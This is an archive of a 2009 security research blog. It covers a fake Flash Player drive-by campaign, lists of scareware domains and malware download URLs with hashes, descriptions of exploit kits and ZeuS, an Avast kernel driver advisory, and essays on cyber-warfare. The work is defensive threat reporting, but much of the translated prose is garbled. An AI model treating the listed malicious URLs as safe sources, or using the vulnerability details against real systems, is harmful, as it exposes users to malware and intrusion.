Tuesday, September 29, 2009

Welcome Ocean!

Belated warm welcome to "OCEAN", a new member of EvilFingers. He is starting as a blogger for EvilFingers blog. Later, he might be joining one of our analytics website.

Check out his blog when you get a chance: http://inseclab.netsons.org/

- EF

Automatic propagation of malicious code via http

Well we know that the processes by automating the propagation of malware is one of the basic objectives of any cyber criminal, regardless of the attack vectors and technologies used.

In this sense, the Internet has become the cradle that rocked different parts alternatives through alternative malicious attack that evolves daily. Several years ago it was quite difficult to assume that by merely accessing a page is a danger of infection if certain requirements are met the system requirements that have to do primarily with operating system updates and applications.

Today, we find script's whose instructions are made maliciously and are part of a cycle of spread and infection, unfortunately, very effective. A concrete example of not only evolution but also of effectiveness, it's the art Drive-by-Download with his attacks evolved version of Multi-Stage, highly used by botmasters to propagate threats.

The following is an actual scenario that more clearly exemplifies what I have. This is a site hosted in EEUU under the IP in AS32392. Below shows a screenshot of the website.

The domains hosted on that IP are:
  • phonester.biz
  • phonester.com
  • phonester.info
  • phonester.net
  • phonester.org
When accessed from Windows, through a script embedded in HTML code, it automatically runs a window offering to download Flash Player. It's obviously false. The file that is propagated is called "install_flash_player.exe" (abed2d16e5e4c3e369114d01dff4b19c) and has a low detection rate, as only about 25% of the antivirus engine detects malware that is In-the-Wild.

This automatic processing is carried out, as I said, through a script, whose capture is seen below. The issue with this is probably that when the user doesn't carry any indication of malicious content, in fact, the page contains no links, only an image.

However, in a transparent way the script is run that prompts to download the fake Flash Player. Now ... the issue doesn't end here. From a more technical standpoint, there are many details that aren't difficult to grasp.

In principle, desofuscar the script, get a series of relevant data. The script has iframe tags that address a range of websites from where you download other malicious files.
  • diggstatistics.com/flash/pdf.php
  • diggstatistics.com/flash/directshow.php
  • diggstatistics.com/flash/exe.php
Download files are "tylda.exe" (abed2d16e5e4c3e369114d01dff4b19c) that has a low detection rate (5/41-12.20%) and "pdf.pdf" (9cc400edcdc5492482f5599d43b76c0c) with a detection rate too low (13/41-31.71 %) and designed to exploit vulnerabilities in Adobe Reader and Acrobat. Adobe util.printf overflow (CVE-2008-2992) and Adobe getIcon (CVE-2009-0927) respectively.

Moreover, in the unlikely event that the file is downloaded in the first instance (install_flash_player.exe) is executed, the connection set against garynic/ from where you downloaded the binary "coin.exe" (258c0083f051b88ea36d3210eca18dd7) with a detection rate also quite poor. This file is downloaded at random from:
  • digital-plr.com
  • giggstatistics.com
  • xebrasearch.com
With regard to the ASN in which these threats are, pose a criminal history interesting as it's used to carry out activities such as spreading malware phishing. In the next image, the highest peak of phishing activities took place on 1 March 2009, while the malicious code was on 12 September 2009.

That is, these activities are operated together, not in isolation. This information doesn't assume that the pattern behind all these criminal activities is hiding some botmaster greed, since the actions are typical of a botnet.

Related information
Propagación de Malware (...) con formato de blogging y BlackHat SEO
Simbiosis del malware actual. Koobface
Scareware. Repositorio de malware In-the-Wild
Masiva propagación de malware (...) sitios de entretenimiento
Análisis esquemático de un ataque de malware basado en web

Jorge Mieres

Monday, September 28, 2009

Twitter.com/EvilFingers is Back!

Hey guys,

Twitter.com has finally removed my account from the SUSPENDED category, which would allow us to Tweet again. Follow us @ twitter.com/evilfingers when you get a chance.

Thank you.

CYBINT in the business of Russian cybercriminals

Those who follow this blog sporadically have noticed that most of this year I spent most of the post to bring out many of the applications from a black market flooded Russia where all types of crimeware is available to professional cyber-criminals (botmasters , spammers, phishers, "¿cyber-terrorists?", etc.) but without neglecting the candidates seeking to become high-ranking offenders.

In this sense, time allows us to witness how they allowed this illegal industry fueled heavily by Eastern European countries (particularly Russia), China and some Latin American countries led by Brazil. However, the flow and focus attention in Russia, and as I said at some point, I reminded the world that Gibson describes in Neuromancer, where the illegal marketing of malware is developed in the dark streets of the suburb.

Perhaps, like I did at some point, many will wonder, whatever type of crimeware that could be opened or motivations (the main one has an acronym: USD) of cyber-criminals, who are behind this?

If we consider that the sale of programs is done around a dark business that is part of an industry that operates from the underground (RBN - Russian Business Network), which are cells that lead to well organized fraud conducted via the Internet (eg Russian scammers) corporate espionage (hiring pirates), among other things, it's easy to see that everything has a mafia connotation. And if we go deeper into the origin of the Russian mafia, easily conclude that was conceived by former KGB agents (Intelligence of the former Soviet Union).

In fact, it's estimated that this criminal network with former agents of what became the KGB and now in more than one occasion, has worked in conjunction with the FSB (Federal Security Service of the Russian Federation), the successor to the KGB.

What I mean by this? Although perhaps what I write may seem extreme, we find ourselves in times in which we witness the virtual conflicts involving certain countries. Such computer attacks that we see in Hollywood movies, a little exaggerated, in recent years have made fiction to enter the real world scene, and in this sense, CYBINT (Cyber Intelligence) plays a fundamental role.

For example, more and more cases of defacement that although is not new, made news when it affects the availability of government web sites that form the heart of cyber-warfare on duty . The DDoS (Distributed Denial of Service), carried out through botnets, such as that suffered the site of President of Georgia during the conflict with Russia, the Russians actually loaded a couple more (Estonia and Lithuania), are clear examples of actions that seek to complement the operations at the military level.

What is striking about cases like those mentioned in the preceding paragraph, left in full evidence there is advance planning, in coordination, it is not nothing but an intelligence plan. In the case of defacement, it may seem trivial, we could say that within the conflict, is part of psychological operations that seek to weaken the morale of the opposing side.

However, other less trivial aspects are also part of the intelligence plans, and generally are operated through technological resources, eg attacking the availability of telephone networks (COMINT), interruption of satellite signals and attacking other networks (SIGINT), including the public nature, affecting the confidentiality of people using malware.

Under all this scenery, the RBN, one of the organizations biggest cyber-criminals operating under the infrastructure of the Internet, is the basis on which to commit, from Russia (though there is a strong rumor about the RBN are migrating their operations to China), many malicious actions channeled into pedophilia, pornography, commercialization of crimeware, malware, phishing, botnets and more.

This really shows that aspect involving the cyber-crime are controlled and operated by a mob in which Russian cybercriminals up one of the most important pieces for the development of crimeware industry globally, and as we see ... Anything goes and everything merges into everything ...

Related information
Inteligencia informática, Seguridad de la Información y Ciber-Guerra
Los precios del crimeware ruso. Parte 2

Jorge Mieres

Twitter Power

Either Twitter needs to upgrade its hardware, or it should find a way to load balance its traffic. Most of our friends using Twitter, are finding it hard to reach their own accounts sometimes.

Also, we finally found the reason as to why our Twitter account was suspended.

* Your account was suspended for posting duplicate content over multiple accounts or multiple duplicate updates on one account, a violation of our terms of service and the Twitter Rules that we take very seriously.

* Your account will remain suspended for a minimum of 30 days; at the end of that time, you may petition for reinstatement. You may do so by either a) re-opening this ticket or b) filing a new ticket and referencing this one.

Thank you,

The tool we used to tweet with on iPhone, did not show that we already tweeted once, and hence when we hit Resend, Twitter blocked us for tweeting the same tweet twice.

Twitter! You really need to ask the responsible party for their reasons before you suspend a valid user.

- EF

SmitFraudFix v2.423 (WinXP, Win2K)

S!ri is a security analyst working actively on Crimeware detection. He has joined us for leading the Crimeware Analytics team along with Jorge Mieres.

S!ri's blog could be found @ the following link:

SmitFraudFix, a free crimeware detection tool is created by S!ri for helping our community.

This tool removes Desktop Hijack malware: Advanced Antivirus, Advanced Virus Remover, AdwarePunisher, AdwareSheriff, AlphaCleaner, AntiSpyCheck, AntiSpyware Expert, Antispyware Soldier, AntiVermeans, AntiVermins, AntiVerminser, AntiVirGear, Antivirus 2009, Antivirus 2010, Antivirus 360, AntiVirus Lab 2009, Antivirus Master, Antivirus Sentry, Antivirus System Pro, Antivirus XP 2008, AntivirusGolden, AV Antispyware, AVGold, Awola, BraveSentry, Coreguard Antivirus, Extra Antivirus, HomeAntivirus 2009, IE Defender, IE-Security, Internet Antivirus, Malware Defender 2009, MalwareCrush, MalwareWipe, MalwareWiped, MalwaresWipeds, MalwareWipePro, MalwareWiper, Micro Antivirus 2009, MS AntiSpyware 2009, MS Antivirus, PC Protection Center 2008, Personal Defender 2009, PestCapture, PestTrap, Power Antivirus, Power-Antivirus-2009, PSGuard, quicknavigate.com, RegistryFox, Registry Cleaner, Renus 2008, Security iGuard, Smart Antivirus 2009, Smitfraud, SmitFraudFixTool, Spy Protector, SpyAxe, SpyCrush, SpyDown, SpyFalcon, SpyGuard, SpyHeal, SpyHeals, SpyLocked, SpyMarshal, SpySheriff, SpySoldier, Spyware Guard 2008, Spyware Protect 2009, Spyware Vanisher, Spyware Soft Stop, SpywareLocked, SpywareQuake, SpywareKnight, SpywareRemover, SpywareSheriff, SpywareStrike, Startsearches.net, System Antivirus 2008, System Guard 2009, TheSpyBot, TitanShield Antispyware, Total Protect 2009, Total Secure 2009, Trust Cleaner, Ultimate Antivirus 2008, UpdateSearches.com, UnVirex, Virtual Maid, Virus Heat, Virus Protect, Virus Protect Pro, VirusBlast, VirusBurst, VirusRay, Virus Remover 2008, Virus Shield, VirusResponse Lab 2009, VirusTrigger, Win32.puper, WinHound, WinPC Defender, WiniBlueSoft, Vista Antivirus 2008, WinDefender 2009, XLG Security Center, XP Deluxe Protector, XP Security Center, XPert Antivirus, XP Police Antivirus, Brain Codec, ChristmasPorn, DirectAccess, DirectVideo, EliteCodec, eMedia Codec, EZVideo, FreeVideo, Gold Codec, HQ Codec, iCodecPack, IECodec, iMediaCodec, Image ActiveX Object, Image Add-on, IntCodec, iVideoCodec, JPEG Encoder, Key Generator, LookForPorn, Media-Codec, MediaCodec, MMediaCodec, MovieCommander, MPCODEC, My Pass Generator, NetProject, Online Image Add-on, Online Video Add-on, PCODEC, Perfect Codec, PowerCodec, PornPass Manager, PornMag Pass, Pornovid, PrivateVideo, QualityCodec, Silver Codec, SearchPorn, SexVid, SiteEntry, SiteTicket, SoftCodec, strCodec, Super Codec, TrueCodec, VideoAccess, VideoBox, VidCodecs, Video Access ActiveX Object, Video ActiveX Object, Video Add-on, VideoCompressionCodec, VideoKeyCodec, VideosCodec, WinAntiSpyPro, WinMediaCodec, X Password Generator, X Password Manager, ZipCodec, WinCoDecPRO...


Use this URL to download the latest version (the file contains both English and French versions):

This tool was created by S!Ri, and is available for FREE.
Voluntary donations will be accepted by S!Ri, at his main website only.
Anyone, other than the creator, trying to make a profit
or solicit money from its use would be involved in fraudulent activity.

-- Source: http://siri.urz.free.fr/Fix/SmitfraudFix_En.php

We thought of sharing this great tool with our community, and would like our community to give a warm welcome to S!ri and Jorge Mieres in their efforts to build and improve the Crimeware Analytics community.

- EF

Sunday, September 27, 2009

IOCTL fuzzer parser

As written on esage lab, website of IOCTL fuzzer creators:
"IOCTL Fuzzer is a command line tool designed to automate searching vulnerabilities in Windows kernel drivers by performing fuzz tests on them."

When started without a configuration the tool starts in a useful monitor mode, that will log irps. From the log we can see driver, device, process and IOCTL in irp, these will be of interest to create a configuration for the fuzzer.

example of use: ioctl_fuzzer > log

Wandering through the log can take a little to find what we are looking for, that's where IOCTL filter comes in help.
It's a python script written to help organize IOCTL fuzzer logs better and find immediately what we need.

example of use: python ioctl_fuzzer.py -p process <> out

it takes the log from stdin and outputs to stdout, with -p, -e, -r options we can choose to filter only a process/device/driver respectively containing a word we are interested in.
In the example we are interested in all processes which name contains "process".

With informations retrieved, we can then build a configuration xml to fuzz the IRPs we are interested in.


Crimeware, Scareware, Ransomware & Rogueware

Crimeware is a class of malware designed specifically to automate cybercrime.[1] The term was coined by Peter Cassidy, Secretary General of the Anti-Phishing Working Group to distinguish it from other kinds of malevolent programs.[citation needed]

Crimeware (as distinct from spyware, adware, and malware) is designed (through social engineering or technical stealth) to perpetrate identity theft in order to access a computer user's online accounts at financial services companies and online retailers for the purpose of taking funds from those accounts or completing unauthorized transactions that enrich the thief controlling the crimeware. Crimeware also often has the intent to export confidential or sensitive information from a network for financial exploitation. Crimeware represents a growing problem in network security as many malicious code threats seek to pilfer confidential information.

Source: http://en.wikipedia.org/wiki/Crimeware


Scareware comprises several classes of scam software, often with limited or no benefit, sold to consumers via certain unethical marketing practices. The selling approach is designed[by whom?] to cause shock, anxiety, or the perception of a threat, generally directed at an unsuspecting user. Some forms of spyware and adware also use scareware tactics.

A frequently used tactic involves convincing users that a virus has infected their computer, then suggesting that they download (and pay for) antivirus software to remove it. Usually the virus is entirely fictional and the software is non-functional or malware.[1] According to the Anti-Phishing Working Group, the number of scareware packages in circulation rose from 2,850 to 9,287 in the second half of 2008.[2]

The "scareware" label can also apply to any application or virus (not necessarily sold as above) which pranks users with intent to cause anxiety or panic.

Source: http://en.wikipedia.org/wiki/Scareware


Ransomware is computer malware which holds a computer system, or the data it contains, hostage against its user by demanding a ransom for its restoration.

Source: http://en.wikipedia.org/wiki/Ransomware_(malware)


Rogue security software is a form of computer malware that deceives or misleads users into paying for the fake or simulated removal of malware. Rogue security software, in recent years, has become a growing and serious security threat in desktop computing.[1]

Source: http://en.wikipedia.org/wiki/Rogue_security_software

Crimeware, Scareware, Ransomware & Rogueware are different, but they all unite in one term "Malware". They are different classes of malwares, divided according to their properties and relationship.

- EF

Saturday, September 26, 2009

Blonde spammers

Have you ever received an email by beatiful blonde girls that you don't know? And they want to know you, to get one of your photo to know you better.

Maybe you asked yourself how a beautiful girl you don't know have got your personal email and why she wants to know you if you have never seen her.

Strange story... collecting some of these emails can give us some answers.
Collecting them showed one thing first of all, all the collected emails shows blonde girl, why don't a brown one?

Maybe seeing a blonde andid and innocent girl get your defenses low, so you wouldn't think about the risks that poses replying such an email.

Let's get a deeper look at some of the images received with the emails:

some exif data tells that gd-jpeg has been used to create the images, gd is an open source graphics library with bindings for lots of programming languages (some other images found have less suspicious exif data).

so we got another question now... why would a girl use a graphics library?

Get all the questions togheter and we can say that this email can be:
  • a fraud
  • a way for spammers to see if the email is active
  • a try to steal sensitive informations
this case should make think about the different treats that an attack can pose even with a simple email and the collaboration of the victim.


A recent tour of scareware XV

New wave of scareware that runs on the Internet. As I clarify in each of the entries in this series, the list comprising these URL's and IP addresses represents only a small percentage, very small, the impressive body of IP's and domains that daily spread this type of malware.

MD5: 96a2cfdb534b547518a446a48150624e
Korea, Republic Of Korea, Republic Of Seoul Hanaro Telecom Inc
Associated Domains

Result: 24/41 (58.54%)

Omega AntiVir = Windows System Suite
Canada Canada Brampton Velcom
Associated Domains

MD5: 8b1555ab8de5f4884e95e72d1755c984
Russian Federation Russian Federation Madet Ltd
Associated Domains

Result: 7/41 (17.07%)

Soft Safeness = Save Defender = Trust Warrior
Sweden Sweden Stockholm Serverconnect I Norrland
United Kingdom United Kingdom Telos Solutions Ltd
Associated Domains
mail.safetykeeper.com, mail.savekeeper.com, mail.softsafeness.com, ns1.safetykeeper.com, ns1.savekeeper.com, ns1.softsafeness.com, ns2.mitrokili.com, ns2.mredkizerut.com, ns2.ofcilamed.com, ns2.propinutrek.com, ns2.sdrukap.com, ns2.vcerukam.com, ns2.vderuwerol.com, ns2.vredupotre.com, ns2.vtromik.com, softsafeness.com, www.safetykeeper.com, www.softsafeness.com

MD5: 783385a90259131a89da62d10df67fa6
Korea, Republic Of Korea, Republic Of Seoul Thrunet Co. Ltd
Associated Domains
cocoda.co.kr, dvccode.com
i-viewtec.com, microv3.com
newocn.net, phoneboja.com
rich09.com, samsung77.com
Result: 22/41 (53.66%)

malwareurlirblock.com/1/ ( - Germany Germany Lncde-greatnet-newmedia
windows-protectionsuite.com ( - Canada Canada Thornhill Rcp.net
antivirus-plus09.com/install/avplus.exe ( - Ukraine Ukraine Kiev Limited Corp
windows-shield.com, adware-finder.com, av-safety.com, avidentify.com, avir-guardian.com
www.esysprotector.com ( -Ukraine Ukraine Pe Sergey Demin
scareware-killer.com ( - Ukraine Ukraine Tehnologii Budushego Llc
windowsprotection-suite.net ( - United States United States Global Crossing
smogcatalog.info/scan/vds.php ( - United States United States Yucca Valley Airlinereservations.com Inc
weragumasekasuke.com/10580532 (, vuilerdomegase.com/10580532 (, vulertagulermos.com/10580532 (, scukonherproger.com ( - United States United States Kansas City Wholesale Internet Inc
luxmediacodec.com/av-scanner.0.exe ( - United States United States Scranton Network Operations Center Inc
easynettest.com/install/ws.exe ( - Israel Israel Haifa Barak I.t.c
ynoubfa.cn/?uid=186&pid=3&ttl=41a4951046e (, trustsystem-protect.com, online-scanandsecure.net - ( - Canada Canada Brampton Velcom
winfixscanner1.com/download/Soft_21.exe, delete-all-virus09.com ( - Netherlands Netherlands Rotterdam Telos Solutions Ltd
lakrapi.com/1/antivirus_pro_2009_v3.18.exe ( - Germany Germany Erfurt Keyweb Ag Ip Network
yourcomp.us/antivirus_setup.exe ( - Russian Federation Russian Federation Individual Retailer Nevedomskiy A A

Proof Defender 2009
United States United States Portland Donald Wildes
Associated Domains

System Cleaner
United States United States Lancaster Hosting Solutions International Inc
Associated Domains
brand-supplier.net, brands-house.com, brands-house.net, brands-sales.com, brands-vendor.com, brands-vendors.com, brands-vendors.net, discounts-shop.net, discounts-store.com, doctroshield2009.com, fashion-vendors.com, fashion-vendors.net, firstantivir2009.com, firstprotection2009.com, kicks-buy.com, kicks-buy.net, kicks-discount.com, kicks-discount.net, kicks-discounts.com, kicks-discounts.net. kicks-mall.com, kicks-shop.com, kicks-stock.com, kicks-supplier.com, kicks-vendors.com, kicks-vendors.net, liveantivir.com, liveprotectpro.com, luxury-mall.com, luxury-stock.com, myantivirus2009.com, mypharmshop.com, myprotectsuite.com, onguardsoft.com, onlineantivirpro.com, own-shoes.com, own-shoes.net, psp-shop.com, sneakers-buy.com, sneakers-sale.com, sneakers-sales.com, sneakers-stock.com, watches-supplier.com, www.luxury-mall.com

Privacy Center
MD5: 3731bde3c476993cbec9e849e4922c87
Sweden Sweden Stockholm Serverconnect I Norrland
Associated Domains

Result: 6/41 (14.63%)

The goal is to take this information as a resource to block harmful directions.

Related information
Una recorrida por los últimos scareware XIV
Una recorrida por los últimos scareware XIII
Una recorrida por los últimos scareware XII
Una recorrida por los últimos scareware XI
Una recorrida por los últimos scareware X
Una recorrida por los últimos scareware IX
Una recorrida por los últimos scareware VIII
Una recorrida por los últimos scareware VII
Una recorrida por los últimos scareware VI
Una recorrida por los últimos scareware V
Una recorrida por los últimos scareware IV
Una recorrida por los últimos scareware III
Una recorrida por los últimos scareware II
Una recorrida por los últimos scareware I

Jorge Mieres

New version of Eleonore Exploits Pack In-the-Wild

As usual, the crimeware remains a development cycle that does not lose the focus nurtured in the minds of cyber criminals who are behind their marketing: money.

This cycle depends directly on who develops the crimeware, e.g. in the case of ZeuS, the cycle is about 30 days or about every month there is a new version of ZeuS, and so with any of the alternatives.

In this case, it's a new version, 1.3B, Eleonore Exploits Pack, this package designed to manage and control a botnet zombies that development follows a cycle similar to the one above to refer to ZeuS, one of his colleagues .

Not yet released directly Eleonore Exp this version but is available exclusively and for the moment, there are only some versions of test for which is experiencing its operation.

In other words, this new version isn't in the underground environment specialist and was acquired only through its programmer.

So far I haven't addressed this issue in greater depth, however, I feel that perhaps the most important change lies about the availability of new exploits, connectivity and optimization improvements in the intelligence process for obtaining data statistics related to zombies (countries, navegadote, OS, etc.).

Still, this reflects the "enthusiasm" with which cybercriminals are working to "optimize" (improvements would say its creator, who calls himself Exmanoize) the range of malicious functions incorporated in each variant.

Related information
Phoenix Exploit’s Kit. Otra alternativa para el control de botnets
iNF`[LOADER]. Control de botnets, marihuana y propagación de malware
Liberty Exploit System. Otra alternativa crimeware para el control de botnets
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild

Jorge Mieres

Jsunpack-n update v0.3a: SWF parsing and Bug fixes release

Read more about the latest release of Jsunpack @ http://jsunpack.blogspot.com/2009/09/jsunpack-n-update-v03a-swf-parsing-and.html

Download the latest version of Jsunpack-n [Version 0.3a]in the following link:


Contact Blake, if you have any questions.

- EF

Friday, September 25, 2009

MalwareURL.com - An interesting site

We came across an interesting site which takes inputs from several sites and enumerates it. Its pretty good stuff for analysts, since it puts things that you want to see in a short and crispy table.

MalwareURL team:
The MalwareURL Team is a group of Internet security experts dedicated to fighting malware, Trojans and a multitude of other web-related threats.

Our database is built-up using proprietary software and analytic techniques to locate, assess and monitor suspected sources of web criminality.

We provide invaluable and up-to-date information to everyone from interested individuals to the world's leading Internet security organizations.

Your use of this web site constitutes agreement to all Terms and Conditions. If you intend to use our lists in a commercial product or service, please contact us for licensing information.

--Source: MalwareURL.com

- EF

Thursday, September 24, 2009

Gmail Chat is back!

The Chat is back and fully functional. Yay!


Unusual & Disturbing

GMAIL Chat is down! The gchat in the email/gmail is down for the past couple of hours and the only alert that we get is:

Gmail is temporarily unable to access your Contacts. You may experience issues while this persists. Learn more

This is sad. Gmail is the only product that one could think of, as the best thing Google has ever done, apart from the Search Engine where Google gave its entry.

- EF

Wednesday, September 23, 2009

Advisory: Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

Advisory: Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

Version Affected: Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
(untested) Local Privilege Escalation

Discover Date: Sep 13, 2009 PoC Code: Sep 13, 2009
Vendor Notify: Sep 15,2009 Vendor Reply: Sep 15, 2009

Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and this lead to a kernel memory corruption that propagates on the system with a BSOD and potential risk of Privilege Escalation.

00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed
00010F77 jnz loc_111AC
00010F7D mov esi, [ebp+SourceString]
00010F80 cmp [esi], ebx
00010F82 mov [ebp+arg_C], ebx

[Scroll down for more details...]

Giuseppe 'Evilcry' Bonfa' (Project Manager, www.EvilFingers.com)
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org, http://evilcodecave.blogspot.com

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.

Click here to read the entire advisory & PoC.

- EF

Tuesday, September 22, 2009

Who makes your decisions?

Would you let some stranger make your decision? Would you like to see stuff that others want you to see? If the answer is "NO", then why would you go for a decision engine, when you have search engines giving you the freedom you deserve.

Bing - Decision Engine
Google - Search Engine

- EF


Our Twitter account has been suspended for almost a month. We have been contacting Twitter, but we haven't gotten any response yet. Couple of reasons that I could think of are:
1. Our Retweets
2. Adding multiple members at once

Thank you for your patience.
- EF

Monday, September 21, 2009

Effectiveness of the antivirus front ZeuS

After the release of the code of ZeuS in 2007, no doubt, besides being one of the largest botnets, the trojan has become one that has a higher infection rate globally.

In my blog we discussed some features of this botnet, which more than 20 versions from his recent appearance has become more important in the specialized media through a series of reports describing some of its most important aspects

For example RSA, recently published a report on online fraud describing the incorporation of a Jabber component that instantly alerts when your botmaster has recruited a new zombie. S21Sec recently conducted an online seminar on the evolution of ZeuS in the patterns they described their most important among other technical details.

Adding to this wave of company Trusteer, according to a short but interesting report recently released ZeuS presents a different perspective. Titled "Measuring the in-the-wild effectiveness of antivirus against ZeuS" shows clearly the effectiveness of antivirus security solutions against malicious code that spreads in this particular botnet.

There are some interesting facts that emerge from the report. According to it, ZeuS currently has under his command about 3.6 million PCs in the U.S. alone and globally for 44% of the zombies that are part of botnets, which means that and makes it clear that now is the network of zombies larger.

In this sense, the answer could give strong foundation to these data may be due to the popularity of our ZeuS on clandestine marketing environment of the Russian market thanks to its low cost, crimeware in general, and the release of his first versions in different forums from which you can get them for free.

In fact, two generations of ZeuS (version 1 and 2) a high percentage of botnets in-the-wild belong to the first generation with a wide range of versions ranging from 1.0.x.x to 1.1.x.x.

Currently, ZeuS is its public version 1.2.5 although there are private versions with some modifications (improvements to botmasters) that at present not available in hiding under but nevertheless is in-the-wild as the case version 1.2.7.

But most important of this report, as I mentioned above, is channeled into the effectiveness of antivirus as the index showing detection of trojan.

While the data reported by Trusteer are very interesting there are a number of issues to consider. One of them, and that it should be clarified is that ZeuS has an internal application in which the binary is generated and propagated from the configuration file that takes the information for fraudulent phishing attacks and other. But it also lets you run other attacks through exploits designed to exploit vulnerabilities in applications using Flash and PDF readers by .pdf and .swf files.

Moreover, the sample for analysis was 10,000 zombies, although they don't reflect a real data from systems infected with ZeuS and accurate information enables a sufficiently precise about the risk of security represented by the malware.

Of most concern, according to the report infection data collected are based on three factors that directly involve the antivirus programs and which reveals the following levels of effectiveness:
  • Computers without antivirus: 31% infected
  • Computers with outdated antivirus: 14% infected
  • Computers with updated anti-virus with 55% infected
This means that the effectiveness of antivirus programs is low because the detection rate of ZeuS is low. ZeuS is a complex malicious code from the beginning that incorporates a cryptographic module and this must be borne in mind.

Every binary distribution of a new variant means that wide again the response time of the AV adding new victims and increasing their family. More complex still, if we consider that the binary can be (and is) subjected to anti-analysis processes that are offered in bulk online.

Related information
Especial!! ZeuS Botnet for Dummies
Fusión. Un concepto adoptado por el crimeware actual
Botnet. Securización en la nueva versión de ZeuS
ZeuS Carding World Template. (...) la cara de la botnet
Entidades financieras en la mira de la botnet Zeus II
Entidades financieras en la mira de la botnet Zeus I
LuckySploit, la mano derecha de Zeus
ZeuS Botnet. Masiva propagación de su troyano II
ZeuS Botnet. Masiva propagación de su troyano I

Other packages to control botnets
Phoenix Exploit’s Kit
Hybrid Botnet Control System
Botnet Open Source
Liberty Exploit System
TRiAD HTTP Control System
Eleonora Exploit Pack
Unique Sploits Pack
YES Exploit System

Botnet Activities
Waledac/Storm. Pasado y presente de una amenaza latente
Simbiosis del malware actual. Koobface
Entendiendo las redes Fast-Flux
Danmec Bot, redes Fast-Flux y reclutamiento de Zombies PCs

Jorge Mieres

Sunday, September 20, 2009

Computer Intelligence, Information Security and Cyber-Warfare

Undoubtedly, we are increasingly dependent on technology and computer networks, not only at home but also at much higher levels as are business and government where the need to obtain and preserve information become relevant actions.

Under this scenario, create new challenges and new strategies to address these challenges at the same time, make the rules of a game where technological resources, information and intelligence processes are the key pieces to ensure business continuity (in trade) and the operation of government projects/military at any level.

First, because business environments are pouring money into new and better technologies to ensure the survival of their business and keep your information reaches the hands of competitors, jealously guarded by security schemes that seek to curb the actions of hired computer is often hired to perform espionage.

On the other hand, states also invest in technologies through its intelligence services (government and military) giving rise to new ways of getting information in a timely manner under the use of technical resources and different sources of information and intense competition channeling constantly trying to advance on their enemies to steal information that would betray the plans (geopolitical, military and economic) of other nations.

This inevitably means that, from a particular point of view, who we are devoted to information security we should funnel some of the efforts to add state of the art methodologies in certain activities that formerly were awarded only to the intelligence.

In this regard, government initiatives to protect their technological perimeters receive special attention from various States who are involved in a war that is happening in a scene that many may consider again, but nevertheless it isn't: the virtual and whose strategies the "battle" was conducted behind closed doors by using something as common as today's Internet.

These matches aren't based on mass murder as in a conventional war, but are based on computer and technological aspects. Consequently, those who develop better technologies and better implement it, enjoy the ability to obtain higher and better level of information. This form of struggle and large-scale unconventional called Cyber-Warfare.

What are we talking about? It's the use of computerized systems for carrying out a war over the Internet. From this perspective, it becomes necessary to resort to Computer Intelligence (CYBINT - Cyber Intelligence).

From a broad perspective, the Cyber-Warfare is no different to what specialists make Information Security in trying to devise defensive strategies, and offensive, to the safeguarding and protection of information, whether at government or private .

Can we say then that those who dedicate ourselves to this we are soldiers in a war that develops virtual world? I would say it indirectly. We are part of a virtual war that feeds on other smaller and private.

From the very existence of intelligence, information became the spoils of war and at the same time, the food with which daily feed regardless of the methods and mechanisms used for their production. So it's obviously the reason for designing mechanisms to obtain in a timely manner.

Gestate strategies and tactics to virtual combat and conflict scenarios carefully planned by intelligence analysts and other characters from the secret that is entertaining environment from a desktop designing action plans to enable implant rumors, shares of diversion and propaganda campaigns to cover up questions "good" (in the broad sense of the word) without attracting the attention of others, even through malware.

It's then that one of the most important parts of the Cyber-Warfare is Information Warfare, but through information technology and where the soldiers are people with extensive computer skills that are risking their lives the battlefield, their weapons are computers and their ammunition are the bits.

The intelligence services know this very well and were always involved in computations maneuvers designed to "learn more from others" (individuals, governments, companies ...), resorting to espionage through actions that involve technological resources as COMINT (Communications Intelligence) and other not so much as HUMINT (Human Intelligence) but directly related to Information Security, among other activities of military intelligence.

All these issues we directly applied the relevant conflicts that were generated in recent years with cases such as USA and Israel, Russia and Estonia, among others where hacktivism, computer vandalism, campaigns propagandists and psychological action strategies flood Internet for the sole fact weaken the opponent.

The first question that might be created in the mind is why use technology in this way? Well ... Sun Tzu I make it quite excellent when still no one spoke of it: "The enemy that operates in isolation, lacking a strategy and taking their opponents lightly will inevitably end up being defeated."

Jorge Mieres

Saturday, September 19, 2009

Phoenix Exploit's Kit. Another alternative for controlling botnets

This is another of the alternatives in the underground market crimeware. In this case, another web application developed in PHP and originally from Eastern Europe. Phoenix Exploit's Kit.

This package consists of nine (9) exploits:
  • IE6 MDAC
  • MS Office Snapshot
  • PDF Collab / printf / getIcon in Adobe Reader
  • IE7 MEMCOR in Internet Explorer 7, Windows XP and Windows Vista
  • FF Embed
  • Flash 9 in plugin vulnerable of Shockwave Flash
  • JAVA in JRE
  • Flash 10 in the versions and of Flash Player
As information processing, Phoenix allows, as is usual in most such programs, to obtain statistical data on the types of browsers (MSIE, Firefox, Opera, etc.), versions of browsers, operating systems such infected countries of origin and some more data that together they become a normal intelligence process conducted by the botmasters.

While Phoenix Exploit's Kit isn't a recent development, the first version emerged in the heyday of this type of crimeware (2007), currently in the "business" underground at a price that raced around USD 400 when purchased with a domain.

Phoenix joins the collection and supply of a criminal world that moves everyday gear dark underground and illegal businesses on the Russian market of crimeware.

Related information
iNF`[LOADER]. Control de botnets, marihuana y (...) malware
Fragus. Nueva botnet framework In-the-Wild
Liberty Exploit System. Otra alternativa crimeware...
Los precios del crimeware ruso. Parte 2
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild

Jorge Mieres

Sunday, September 13, 2009

The danger of a new generation of bootkits

While both the rootkits as bootkit part of the same concept and end up being the ultimate goals remain the same, there are certain patterns that differentiate and make bootkit the inevitable evolution of rootkit conventional state of the art by adding more complex actions.

